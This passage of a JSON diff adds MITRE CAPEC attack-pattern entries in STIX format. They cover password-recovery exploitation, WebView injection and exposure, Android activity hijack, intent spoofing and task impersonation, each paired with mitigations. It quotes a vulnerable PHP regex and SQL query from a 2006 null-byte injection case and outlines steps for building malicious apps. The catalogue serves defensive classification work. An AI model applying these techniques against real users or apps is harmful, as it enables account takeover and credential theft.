whole host of opportunities are available." + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "System must use weak authentication mechanisms for administrative functions." 
+ ], + "x_capec_resources_required": [ + "CCITT-5 or other vulnerable lines, with the ability to send tones such as combined 2,400 Hz and 2,600 Hz tones to the switch" + ], + "x_capec_skills_required": { + "Low": "Given a vulnerable phone system, the attackers' technical vector relies on attacks that are well documented in cracker 'zines and have been around for decades." + }, + "x_capec_status": "Obsolete", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Upgrade phone lines. Note this may be prohibitively expensive", + "id": "course-of-action--ad48d35a-8497-454e-a5b3-7ce3c8b75663", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-5-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--49c94014-b8f3-4700-b509-8b705cbfbb0c", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ad48d35a-8497-454e-a5b3-7ce3c8b75663", + "spec_version": "2.1", + "target_ref": "attack-pattern--7b462c1f-e0bf-41a7-b811-2b676c103bda", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use strong access control such as two factor access control for administrative access to the switch", + "id": "course-of-action--3a64abb3-73d9-4d4b-b7d8-afda18b016a0", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-5-1", + "object_marking_refs": [ + 
"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9246fa28-1064-427d-b782-252991eab85a", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3a64abb3-73d9-4d4b-b7d8-afda18b016a0", + "spec_version": "2.1", + "target_ref": "attack-pattern--7b462c1f-e0bf-41a7-b811-2b676c103bda", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker may take advantage of the application feature to help users recover their forgotten passwords in order to gain access into the system with the same privileges as the original user. 
Generally password recovery schemes tend to be weak and insecure.", + "external_references": [ + { + "external_id": "CAPEC-50", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/50.html" + }, + { + "external_id": "CWE-522", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/522.html" + }, + { + "external_id": "CWE-640", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/640.html" + }, + { + "description": "Advisory: Unauthorized password recovery in phpBannerExchange, 2006, RedTeam Pentesting GmbH", + "external_id": "REF-429", + "source_name": "reference_from_CAPEC", + "url": "http://www.redteam-pentesting.de/advisories/rt-sa-2006-005.txt" + } + ], + "id": "attack-pattern--addd93c9-9278-4185-b402-e505d632c815", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Password Recovery Exploitation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_precede_refs": [ + "attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a", + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b", + "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7", + "attack-pattern--f2654def-b86d-4ddb-888f-de6b50a103a2", + "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a" + ], + "x_capec_child_of_refs": [ + "attack-pattern--c727c058-2c9d-4021-a1ec-81dd030dea59" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "An attacker clicks on the \"forgot password\" and is presented with a single security question. The question is regarding the name of the first dog of the user. The system does not limit the number of attempts to provide the dog's name. 
An attacker goes through a list of 100 most popular dog names and finds the right name, thus getting the ability to reset the password and access the system.", + "\n phpBanner Exchange is a PHP script (using the mySQL database) that facilitates the running of a banner exchange without extensive knowledge of PHP or mySQL.\n A SQL injection was discovered in the password recovery module of the system that allows recovering an arbitrary user's password and taking over their account. The problem is due to faulty input sanitization in the phpBannerExchange, specifically the e-mail address of the user which is requested by the password recovery module.\n The e-mail address requested by the password recovery module on the resetpw.php page. That e-mail address is validated with the following regular expression:\n if(!eregi(\"^[_a-z0-9-]+(\\.[_a-z0-9-]+)*@[a-z0-9-]+(\\.[a-z0-9-]+)*(\\.[a-z]{2,3})$\", $email)){\n \n A bug in the implementation of eregi() allows to pass additional character using a null byte \"\\0\". Since eregi() is implemented in C, the variable $email is treated as a zero-terminated string. All characters following the Null Byte will not be recognized by the regular expression. So an e-mail address can be provided that includes the special character \" ' \" to break the SQL query below (and it will not be rejected by the regular expression because of the null byte trick). So a SQL injection becomes possible:\n $get_info=mysql_query(\"select * from banneruser whereemail='$email' \");\n \n This query will return a non-zero result set even though the email supplied (attacker's email) is not in the database.\n Then a new password for the user is generated and sent to the $email address, an e-mail address controlled by the attacker. An attacker can then log in into the system.See also: CVE-2006-3013" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Understand the password recovery mechanism and how it works.

Exploit

  1. Find a weakness in the password recovery mechanism and exploit it. For instance, a weakness may be that a standard single security question is used with an easy to determine answer.

", + "x_capec_extended_description": "\n Most of them use only one security question. For instance, mother's maiden name tends to be a fairly popular one. Unfortunately in many cases this information is not very hard to find, especially if the attacker knows the legitimate user. These generic security questions are also re-used across many applications, thus making them even more insecure. An attacker could for instance overhear a coworker talking to a bank representative at the work place and supplying their mother's maiden name for verification purposes. An attacker can then try to log in into one of the victim's accounts, click on \"forgot password\" and there is a good chance that the security question there will be to provide mother's maiden name. A weak password recovery scheme totally undermines the effectiveness of a strong password scheme.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The system allows users to recover their passwords and gain access back into the system.", + "Password recovery mechanism has been designed or implemented insecurely.", + "Password recovery mechanism relies only on something the user knows and not something the user has.", + "No third party intervention is required to use the password recovery mechanism." + ], + "x_capec_resources_required": [ + "For a brute force attack one would need a machine with sufficient CPU, RAM and HD." + ], + "x_capec_skills_required": { + "Low": "Brute force attack", + "Medium": "Social engineering and more sophisticated technical attacks." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use multiple security questions (e.g. have three and make the user answer two of them correctly). 
Let the user select their own security questions or provide them with choices of questions that are not generic.", + "id": "course-of-action--5aefd1ed-4d4b-46a4-9523-4a9b10f1c157", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-50-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6da8ba67-d140-4a4f-9f59-04f18c0652dd", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5aefd1ed-4d4b-46a4-9523-4a9b10f1c157", + "spec_version": "2.1", + "target_ref": "attack-pattern--addd93c9-9278-4185-b402-e505d632c815", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "E-mail the temporary password to the registered e-mail address of the user rather than letting the user reset the password online.", + "id": "course-of-action--faa418c0-4283-4c6d-b462-3c7751003bae", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-50-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--aa9f80ff-b2df-47d3-9f28-3979f0827e13", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--faa418c0-4283-4c6d-b462-3c7751003bae", 
+ "spec_version": "2.1", + "target_ref": "attack-pattern--addd93c9-9278-4185-b402-e505d632c815", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that your password recovery functionality is not vulnerable to an injection style attack.", + "id": "course-of-action--17e33f25-5647-4186-9496-39840fbc7a3c", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-50-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--347ed834-4679-4e4c-9b81-cde8d3103190", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--17e33f25-5647-4186-9496-39840fbc7a3c", + "spec_version": "2.1", + "target_ref": "attack-pattern--addd93c9-9278-4185-b402-e505d632c815", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary, through a previously installed malicious application, injects code into the context of a web page displayed by a WebView component. 
Through the injected code, an adversary is able to manipulate the DOM tree and cookies of the page, expose sensitive information, and can launch attacks against the web application from within the web page.", + "external_references": [ + { + "external_id": "CAPEC-500", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/500.html" + }, + { + "external_id": "CWE-749", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/749.html" + }, + { + "external_id": "CWE-940", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/940.html" + }, + { + "description": "Tongbo Luo, Hao Hao, Wenliang Du, Yifei Wang, Heng Yin, Attacks on WebView in the Android System, 2011, Annual Computer Security Applications Conference (ACSAC)", + "external_id": "REF-430", + "source_name": "reference_from_CAPEC", + "url": "http://www.cis.syr.edu/~wedu/Research/paper/webview_acsac2011.pdf" + } + ], + "id": "attack-pattern--3a089725-f495-452a-a40b-980898ec308c", + "modified": "2023-01-24T00:00:00.000Z", + "name": "WebView Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--5a33bee7-5ec9-4e75-9bf6-99fdaca8699c" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine target web application: An adversary first needs to determine what web application they wish to target.

  2. Techniques
    Target web applications that require users to enter sensitive information.
    Target web applications that an adversary wishes to operate on behalf of a logged in user.

Experiment

  1. Create malicious application: An adversary creates an application, often mobile, that incorporates a WebView component to display the targeted web application. This malicious application needs to downloaded by a user, so adversaries will make this application useful in some way.

  2. Techniques
    Create a 3rd party application that adds useful functionality to the targeted web application. Victims will download the application as a means of using the targeted web application.
    Create a fun game that at some point directs a user to the targeted web application. For example, prompt the user to buy in game currency by directing them to PayPal.
  3. Get the victim to download and run the application: An adversary needs to get the victim to willingly download and run the application.

  4. Techniques
    Pay for App Store advertisements
    Promote the application on social media, either through accounts made by the adversary or by paying for other accounts to advertise.

Exploit

  1. Inject malicious code: Once the victim runs the malicious application and views the targeted web page in the WebView component, the malicious application will inject malicious JavaScript code into the web application. This is done by using WebView's loadURL() API, which can inject arbitrary JavaScript code into pages loaded by the WebView component with the same privileges. This is often done by adding a script tag to the document body with a src destination to a remote location that serves malicious JavaScript code.

  2. Techniques
    Execute operations on the targeted web page on behalf of an authenticated user.
    Steal cookie information from the victim.
    Add in extra fields to the DOM in an attempt to get a user to divulge sensitive information.
", + "x_capec_prerequisites": [ + "An adversary must be able install a purpose built malicious application onto the device and convince the user to execute it. The malicious application is designed to target a specific web application and is used to load the target web pages via the WebView component. For example, an adversary may develop an application that interacts with Facebook via WebView and adds a new feature that a user desires. The user would install this 3rd party app instead of the Facebook app." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The only known mitigation to this type of attack is to keep the malicious application off the system. There is nothing that can be done to the target application to protect itself from a malicious application that has been installed and executed.", + "id": "course-of-action--3bed61fa-d7ce-4833-8489-af735deb4503", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-500-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--cd4750af-dabe-4e24-954b-34c20912113b", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3bed61fa-d7ce-4833-8489-af735deb4503", + "spec_version": "2.1", + "target_ref": "attack-pattern--3a089725-f495-452a-a40b-980898ec308c", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary 
intercepts an implicit intent sent to launch a Android-based trusted activity and instead launches a counterfeit activity in its place. The malicious activity is then used to mimic the trusted activity's user interface and prompt the target to enter sensitive data as if they were interacting with the trusted activity.", + "external_references": [ + { + "external_id": "CAPEC-501", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/501.html" + }, + { + "external_id": "CWE-923", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/923.html" + }, + { + "description": "Erika Chin, Adrienne Porter Felt, Kate Greenwood, David Wagner, Analyzing Inter-Application Communication in Android, 2011, International Conference on Mobile Systems, Applications, and Services (MobiSys)", + "external_id": "REF-427", + "source_name": "reference_from_CAPEC", + "url": "https://people.eecs.berkeley.edu/~daw/papers/intents-mobisys11.pdf" + } + ], + "id": "attack-pattern--10ce28bf-9f93-4a45-a39e-6407141a34d4", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Android Activity Hijack", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--48f21dcd-2490-49c6-9690-1cb586b201f4", + "attack-pattern--fc3a9a6f-66c9-4363-8ebd-9bd18725fff8" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Software", + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Find an android application that uses implicit intents: Since this attack only works on android applications that use implicit intents, rather than explicit intents, an adversary must first identify an app that uses implicit intents to launch an Android-based trusted activity, and what that activity is.

Experiment

  1. Create a malicious app: The adversary must create a malicious android app meant to intercept implicit intents to launch an Adroid-based trusted activity. This malicious app will mimic the trusted activiy's user interface to get the user to enter sensitive data.

  2. Techniques
    Specify the type of intent wished to be intercepted in the malicious app's manifest file using an intent filter
  3. Get user to download malicious app: The adversary must get a user using the targeted app to download the malicious app by any means necessary

Exploit

  1. Gather sensitive data through malicious app: Once the target application sends an implicit intent to launch a trusted activity, the malicious app will be launched instead that looks identical to the interface of that activity. When the user enters sensitive information it will be captured by the malicious app.

  2. Techniques
    Gather login information from a user using a malicious app
", + "x_capec_prerequisites": [ + "The adversary must have previously installed the malicious application onto the Android device that will run in place of the trusted activity." + ], + "x_capec_resources_required": [ + "Malware capable of acting on the adversary's objectives." + ], + "x_capec_skills_required": { + "High": "The adversary must typically overcome network and host defenses in order to place malware on the system." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "To mitigate this type of an attack, explicit intents should be used whenever sensitive data is being sent. An 'explicit intent' is delivered to a specific application as declared within the intent, whereas an 'implicit intent' is directed to an application as defined by the Android operating system. If an implicit intent must be used, then it should be assumed that the intent will be received by an unknown application and any response should be treated accordingly (i.e., with appropriate security controls).", + "id": "course-of-action--516fa894-49a7-4f72-93e4-a3f020c282a0", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-501-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f8813501-20bf-40e5-8b15-3723c43763f4", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--516fa894-49a7-4f72-93e4-a3f020c282a0", + "spec_version": "2.1", + "target_ref": 
"attack-pattern--10ce28bf-9f93-4a45-a39e-6407141a34d4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Never use implicit intents for inter-application communication.", + "id": "course-of-action--38f1729a-f19a-4847-86b0-d6fbb1ef4247", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-501-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--aa086131-b814-4144-b0d9-847410959588", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--38f1729a-f19a-4847-86b0-d6fbb1ef4247", + "spec_version": "2.1", + "target_ref": "attack-pattern--10ce28bf-9f93-4a45-a39e-6407141a34d4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary, through a previously installed malicious application, issues an intent directed toward a specific trusted application's component in an attempt to achieve a variety of different objectives including modification of data, information disclosure, and data injection. Components that have been unintentionally exported and made public are subject to this type of an attack. 
If the component trusts the intent's action without verififcation, then the target application performs the functionality at the adversary's request, helping the adversary achieve the desired negative technical impact.", + "external_references": [ + { + "external_id": "CAPEC-502", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/502.html" + }, + { + "external_id": "CWE-284", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/284.html" + }, + { + "description": "Erika Chin, Adrienne Porter Felt, Kate Greenwood, David Wagner, Analyzing Inter-Application Communication in Android, 2011, International Conference on Mobile Systems, Applications, and Services (MobiSys)", + "external_id": "REF-427", + "source_name": "reference_from_CAPEC", + "url": "https://people.eecs.berkeley.edu/~daw/papers/intents-mobisys11.pdf" + } + ], + "id": "attack-pattern--b2e8de4b-6757-4e7e-9c5c-210c44100577", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Intent Spoof", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--bd4f8f46-1bc7-40a9-b15a-e36b7671cf5b" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_prerequisites": [ + "An adversary must be able install a purpose built malicious application onto the Android device and convince the user to execute it. The malicious application will be used to issue spoofed intents." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "To limit one's exposure to this type of attack, developers should avoid exporting components unless the component is specifically designed to handle requests from untrusted applications. 
Developers should be aware that declaring an intent filter will automatically export the component, exposing it to public access. Critical, state-changing actions should not be placed in exported components. If a single component handles both inter- and intra-application requests, the developer should consider dividing that component into separate components. If a component must be exported (e.g., to receive system broadcasts), then the component should dynamically check the caller's identity prior to performing any operations. Requiring Signature or SignatureOrSystem permissions is an effective way of limiting a component's exposure to a set of trusted applications. Finally, the return values of exported components can also leak private data, so developers should check the caller's identity prior to returning sensitive values.", + "id": "course-of-action--ba152037-676b-4900-8500-9e40f8772742", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-502-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--65d8ac0a-e778-439d-a210-5233c586c56e", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ba152037-676b-4900-8500-9e40f8772742", + "spec_version": "2.1", + "target_ref": "attack-pattern--b2e8de4b-6757-4e7e-9c5c-210c44100577", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary, through a malicious web page, accesses application specific functionality by leveraging interfaces registered through 
WebView's addJavascriptInterface API. Once an interface is registered to WebView through addJavascriptInterface, it becomes global and all pages loaded in the WebView can call this interface.", + "external_references": [ + { + "external_id": "CAPEC-503", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/503.html" + }, + { + "external_id": "CWE-284", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/284.html" + }, + { + "description": "Tongbo Luo, Hao Hao, Wenliang Du, Yifei Wang, Heng Yin, Attacks on WebView in the Android System, 2011, Annual Computer Security Applications Conference (ACSAC)", + "external_id": "REF-430", + "source_name": "reference_from_CAPEC", + "url": "http://www.cis.syr.edu/~wedu/Research/paper/webview_acsac2011.pdf" + } + ], + "id": "attack-pattern--c195a0a3-62fc-4def-9702-8938440cc9a7", + "modified": "2020-07-30T00:00:00.000Z", + "name": "WebView Exposure", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--fd669b7d-0e79-473c-9808-a860dfb0c871" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_prerequisites": [ + "This type of an attack requires the adversary to convince the user to load the malicious web page inside the target application. Once loaded, the malicious web page will have the same permissions as the target application and will have access to all registered interfaces. Both the permission and the interface must be in place for the functionality to be exposed." 
+ ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "To mitigate this type of an attack, an application should limit permissions to only those required and should verify the origin of all web content it loads.", + "id": "course-of-action--89e7a7c9-d6c4-4353-adad-ee91dd8fb811", + "modified": "2020-07-30T00:00:00.000Z", + "name": "coa-503-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--1ba307f2-f881-482f-aff4-e2af10977631", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--89e7a7c9-d6c4-4353-adad-ee91dd8fb811", + "spec_version": "2.1", + "target_ref": "attack-pattern--c195a0a3-62fc-4def-9702-8938440cc9a7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary, through a previously installed malicious application, impersonates an expected or routine task in an attempt to steal sensitive information or leverage a user's privileges.", + "external_references": [ + { + "external_id": "CAPEC-504", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/504.html" + }, + { + "external_id": "CWE-1021", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1021.html" + }, + { + "description": "Masquerading: Masquerade Task or Service", + "external_id": "T1036.004", + "source_name": "ATTACK", + "url": 
"https://attack.mitre.org/wiki/Technique/T1036/004" + }, + { + "description": "Adrienne Porter Felt, David Wagner, Phishing on Mobile Devices, 2011, University of California, Berkeley", + "external_id": "REF-434", + "source_name": "reference_from_CAPEC", + "url": "https://people.eecs.berkeley.edu/~daw/papers/mobphish-w2sp11.pdf" + } + ], + "id": "attack-pattern--1995c522-a25d-46e4-b024-65172771a692", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Task Impersonation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--fc3a9a6f-66c9-4363-8ebd-9bd18725fff8" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "An adversary monitors the system task list for Microsoft Outlook in an attempt to determine when the application may prompt the user to enter their credentials to view encrypted email. Once the task is executed, the adversary impersonates the credential prompt to obtain the user's Microsoft Outlook encryption credentials. These credentials can then be leveraged by the adversary to read a user's encrypted email.", + "An adversary prompts a user to authorize an elevation of privileges, implying that a background task needs additional permissions to execute. The user accepts the privilege elevation, allowing the adversary to execute additional malware or tasks with the user's privileges." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine suitable tasks to exploit: Determine what tasks exist on the target system that may result in a user providing sensitive information.

  2. Techniques
    Determine what tasks prompt a user for their credentials.
    Determine what tasks may prompt a user to authorize a process to execute with elevated privileges.

Exploit

  1. Impersonate Task: Impersonate a legitimate task, either expected or unexpected, in an attempt to gain user credentials or to ride the user's privileges.

  2. Techniques
    Prompt a user for their credentials, while making the user believe the credential request is legitimate.
    Prompt a user to authorize a task to run with elevated privileges, while making the user believe the request is legitimate.
", + "x_capec_extended_description": "\n When impersonating an expected task, the adversary monitors the task list maintained by the operating system and waits for a specific legitimate task to become active. Once the task is detected, the malicious application launches a new task in the foreground that mimics the user interface of the legitimate task. At this point, the user thinks that they are interacting with the legitimate task that they started, but instead they are interacting with the malicious application. Once the adversary's goal is reached, the malicious application can exit, leaving the original trusted application visible and the appearance that nothing out of the ordinary has occurred.\n A second approach entails the adversary impersonating an unexpected task, but one that may often be spawned by legitimate background processes. For example, an adversary may randomly impersonate a system credential prompt, implying that a background process requires authentication for some purpose. The user, believing they are interacting with a legitimate task, enters their credentials or authorizes the use of their stored credentials, which the adversary then leverages for nefarious purposes. This type of attack is most often used to obtain sensitive information (e.g., 